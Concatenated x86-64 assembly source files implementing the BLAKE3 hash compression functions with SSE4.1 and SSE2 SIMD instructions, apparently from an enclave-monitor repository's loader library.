paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
pxor xmm0, xmm8
pxor xmm1, xmm9
pxor xmm2, xmm10
pxor xmm3, xmm11
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
pxor xmm4, xmm12
pxor xmm5, xmm13
pxor xmm6, xmm14
pxor xmm7, xmm15
mov eax, r13d
jne 9b
movdqa xmm9, xmm0
punpckldq xmm0, xmm1
punpckhdq xmm9, xmm1
movdqa xmm11, xmm2
punpckldq xmm2, xmm3
punpckhdq xmm11, xmm3
movdqa xmm1, xmm0
punpcklqdq xmm0, xmm2
punpckhqdq xmm1, xmm2
movdqa xmm3, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm3, xmm11
movdqu xmmword ptr [rbx], xmm0
movdqu xmmword ptr [rbx+0x20], xmm1
movdqu xmmword ptr [rbx+0x40], xmm9
movdqu xmmword ptr [rbx+0x60], xmm3
movdqa xmm9, xmm4
punpckldq xmm4, xmm5
punpckhdq xmm9, xmm5
movdqa xmm11, xmm6
punpckldq xmm6, xmm7
punpckhdq xmm11, xmm7
movdqa xmm5, xmm4
punpcklqdq xmm4, xmm6
punpckhqdq xmm5, xmm6
movdqa xmm7, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm7, xmm11
movdqu xmmword ptr [rbx+0x10], xmm4
movdqu xmmword ptr [rbx+0x30], xmm5
movdqu xmmword ptr [rbx+0x50], xmm9
movdqu xmmword ptr [rbx+0x70], xmm7
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm0, xmm1
paddd xmm1, xmmword ptr [rsp+0x150]
movdqa xmmword ptr [rsp+0x110], xmm1
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm0, xmm1
movdqa xmm1, xmmword ptr [rsp+0x120]
psubd xmm1, xmm0
movdqa xmmword ptr [rsp+0x120], xmm1
add rbx, 128
add rdi, 32
sub rsi, 4
cmp rsi, 4
jnc 2b
test rsi, rsi
jnz 3f
4:
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
test esi, 0x2
je 3f
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movaps xmm8, xmm0
movaps xmm9, xmm1
movd xmm13, dword ptr [rsp+0x110]
pinsrd xmm13, dword ptr [rsp+0x120], 1
pinsrd xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmmword ptr [rsp], xmm13
movd xmm14, dword ptr [rsp+0x114]
pinsrd xmm14, dword ptr [rsp+0x124], 1
pinsrd xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmmword ptr [rsp+0x10], xmm14
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm10, xmm2
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm3, xmm4
shufps xmm4, xmm5, 136
shufps xmm3, xmm5, 221
movaps xmm5, xmm3
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm3, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm3, xmm7, 221
pshufd xmm7, xmm3, 0x93
movups xmm12, xmmword ptr [r9+rdx-0x40]
movups xmm13, xmmword ptr [r9+rdx-0x30]
movaps xmm11, xmm12
shufps xmm12, xmm13, 136
shufps xmm11, xmm13, 221
movaps xmm13, xmm11
movups xmm14, xmmword ptr [r9+rdx-0x20]
movups xmm15, xmmword ptr [r9+rdx-0x10]
movaps xmm11, xmm14
shufps xmm14, xmm15, 136
pshufd xmm14, xmm14, 0x93
shufps xmm11, xmm15, 221
pshufd xmm15, xmm11, 0x93
movaps xmm3, xmmword ptr [rsp]
movaps xmm11, xmmword ptr [rsp+0x10]
pinsrd xmm3, eax, 3
pinsrd xmm11, eax, 3
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm8, xmm12
movaps xmmword ptr [rsp+0x20], xmm4
movaps xmmword ptr [rsp+0x30], xmm12
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movaps xmm12, xmmword ptr [ROT16+rip]
pshufb xmm3, xmm12
pshufb xmm11, xmm12
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm5
paddd xmm8, xmm13
movaps xmmword ptr [rsp+0x40], xmm5
movaps xmmword ptr [rsp+0x50], xmm13
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movaps xmm13, xmmword ptr [ROT8+rip]
pshufb xmm3, xmm13
pshufb xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x93
pshufd xmm8, xmm8, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x39
pshufd xmm10, xmm10, 0x39
paddd xmm0, xmm6
paddd xmm8, xmm14
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshufb xmm3, xmm12
pshufb xmm11, xmm12
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm7
paddd xmm8, xmm15
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshufb xmm3, xmm13
pshufb xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x39
pshufd xmm8, xmm8, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x93
pshufd xmm10, xmm10, 0x93
dec al
je 9f
movdqa xmm12, xmmword ptr [rsp+0x20]
movdqa xmm5, xmmword ptr [rsp+0x40]
pshufd xmm13, xmm12, 0x0F
shufps xmm12, xmm5, 214
pshufd xmm4, xmm12, 0x39
movdqa xmm12, xmm6
shufps xmm12, xmm7, 250
pblendw xmm13, xmm12, 0xCC
movdqa xmm12, xmm7
punpcklqdq xmm12, xmm5
pblendw xmm12, xmm6, 0xC0
pshufd xmm12, xmm12, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmmword ptr [rsp+0x20], xmm13
movdqa xmmword ptr [rsp+0x40], xmm12
movdqa xmm5, xmmword ptr [rsp+0x30]
movdqa xmm13, xmmword ptr [rsp+0x50]
pshufd xmm6, xmm5, 0x0F
shufps xmm5, xmm13, 214
pshufd xmm12, xmm5, 0x39
movdqa xmm5, xmm14
shufps xmm5, xmm15, 250
pblendw xmm6, xmm5, 0xCC
movdqa xmm5, xmm15
punpcklqdq xmm5, xmm13
pblendw xmm5, xmm14, 0xC0
pshufd xmm5, xmm5, 0x78
punpckhdq xmm13, xmm15
punpckldq xmm14, xmm13
pshufd xmm15, xmm14, 0x1E
movdqa xmm13, xmm6
movdqa xmm14, xmm5
movdqa xmm5, xmmword ptr [rsp+0x20]
movdqa xmm6, xmmword ptr [rsp+0x40]
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm8, xmm10
pxor xmm9, xmm11
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
movups xmmword ptr [rbx+0x20], xmm8
movups xmmword ptr [rbx+0x30], xmm9
movdqa xmm0, xmmword ptr [rsp+0x130]
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm2, xmmword ptr [rsp+0x120]
movdqu xmm3, xmmword ptr [rsp+0x118]
movdqu xmm4, xmmword ptr [rsp+0x128]
blendvps xmm1, xmm3, xmm0
blendvps xmm2, xmm4, xmm0
movdqa xmmword ptr [rsp+0x110], xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
add rdi, 16
add rbx, 64
sub rsi, 2
3:
test esi, 0x1
je 4b
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movd xmm13, dword ptr [rsp+0x110]
pinsrd xmm13, dword ptr [rsp+0x120], 1
pinsrd xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm3, xmm13
pinsrd xmm3, eax, 3
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
blake3_compress_in_place_sse41:
_blake3_compress_in_place_sse41:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl r8, 32
add rdx, r8
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
movups xmmword ptr [rdi], xmm0
movups xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
blake3_compress_xof_sse41:
_blake3_compress_xof_sse41:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
movdqu xmm4, xmmword ptr [rdi]
movdqu xmm5, xmmword ptr [rdi+0x10]
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm2, xmm4
pxor xmm3, xmm5
movups xmmword ptr [r9], xmm0
movups xmmword ptr [r9+0x10], xmm1
movups xmmword ptr [r9+0x20], xmm2
movups xmmword ptr [r9+0x30], xmm3
ret
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85
.long 0x3C6EF372, 0xA54FF53A
ROT16:
.byte 2, 3, 0, 1, 6, 7, 4, 5, 10, 11, 8, 9, 14, 15, 12, 13
ROT8:
.byte 1, 2, 3, 0, 5, 6, 7, 4, 9, 10, 11, 8, 13, 14, 15, 12
ADD0:
.long 0, 1, 2, 3
ADD1:
.long 4, 4, 4, 4
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 64, 64, 64, 64
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
|
mit-enclaves/argos-monitor | 68,858 | C/libraries/sdktyche/loader/blake3_sse2_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global blake3_hash_many_sse2
.global _blake3_hash_many_sse2
.global blake3_compress_in_place_sse2
.global _blake3_compress_in_place_sse2
.global blake3_compress_xof_sse2
.global _blake3_compress_xof_sse2
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_sse2:
blake3_hash_many_sse2:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 360
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9d
movd xmm0, r9d
pshufd xmm0, xmm0, 0x00
movdqa xmmword ptr [rsp+0x130], xmm0
movdqa xmm1, xmm0
pand xmm1, xmmword ptr [ADD0+rip]
pand xmm0, xmmword ptr [ADD1+rip]
movdqa xmmword ptr [rsp+0x150], xmm0
movd xmm0, r8d
pshufd xmm0, xmm0, 0x00
paddd xmm0, xmm1
movdqa xmmword ptr [rsp+0x110], xmm0
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm1, xmm0
shr r8, 32
movd xmm2, r8d
pshufd xmm2, xmm2, 0x00
psubd xmm2, xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
mov rbx, qword ptr [rbp+0x50]
mov r15, rdx
shl r15, 6
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
cmp rsi, 4
jc 3f
2:
movdqu xmm3, xmmword ptr [rcx]
pshufd xmm0, xmm3, 0x00
pshufd xmm1, xmm3, 0x55
pshufd xmm2, xmm3, 0xAA
pshufd xmm3, xmm3, 0xFF
movdqu xmm7, xmmword ptr [rcx+0x10]
pshufd xmm4, xmm7, 0x00
pshufd xmm5, xmm7, 0x55
pshufd xmm6, xmm7, 0xAA
pshufd xmm7, xmm7, 0xFF
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
9:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movdqu xmm8, xmmword ptr [r8+rdx-0x40]
movdqu xmm9, xmmword ptr [r9+rdx-0x40]
movdqu xmm10, xmmword ptr [r10+rdx-0x40]
movdqu xmm11, xmmword ptr [r11+rdx-0x40]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp], xmm8
movdqa xmmword ptr [rsp+0x10], xmm9
movdqa xmmword ptr [rsp+0x20], xmm12
movdqa xmmword ptr [rsp+0x30], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x30]
movdqu xmm9, xmmword ptr [r9+rdx-0x30]
movdqu xmm10, xmmword ptr [r10+rdx-0x30]
movdqu xmm11, xmmword ptr [r11+rdx-0x30]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x40], xmm8
movdqa xmmword ptr [rsp+0x50], xmm9
movdqa xmmword ptr [rsp+0x60], xmm12
movdqa xmmword ptr [rsp+0x70], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x20]
movdqu xmm9, xmmword ptr [r9+rdx-0x20]
movdqu xmm10, xmmword ptr [r10+rdx-0x20]
movdqu xmm11, xmmword ptr [r11+rdx-0x20]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x80], xmm8
movdqa xmmword ptr [rsp+0x90], xmm9
movdqa xmmword ptr [rsp+0xA0], xmm12
movdqa xmmword ptr [rsp+0xB0], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x10]
movdqu xmm9, xmmword ptr [r9+rdx-0x10]
movdqu xmm10, xmmword ptr [r10+rdx-0x10]
movdqu xmm11, xmmword ptr [r11+rdx-0x10]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0xC0], xmm8
movdqa xmmword ptr [rsp+0xD0], xmm9
movdqa xmmword ptr [rsp+0xE0], xmm12
movdqa xmmword ptr [rsp+0xF0], xmm13
movdqa xmm9, xmmword ptr [BLAKE3_IV_1+rip]
movdqa xmm10, xmmword ptr [BLAKE3_IV_2+rip]
movdqa xmm11, xmmword ptr [BLAKE3_IV_3+rip]
movdqa xmm12, xmmword ptr [rsp+0x110]
movdqa xmm13, xmmword ptr [rsp+0x120]
movdqa xmm14, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
movd xmm15, eax
pshufd xmm15, xmm15, 0x00
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [BLAKE3_IV_0+rip]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
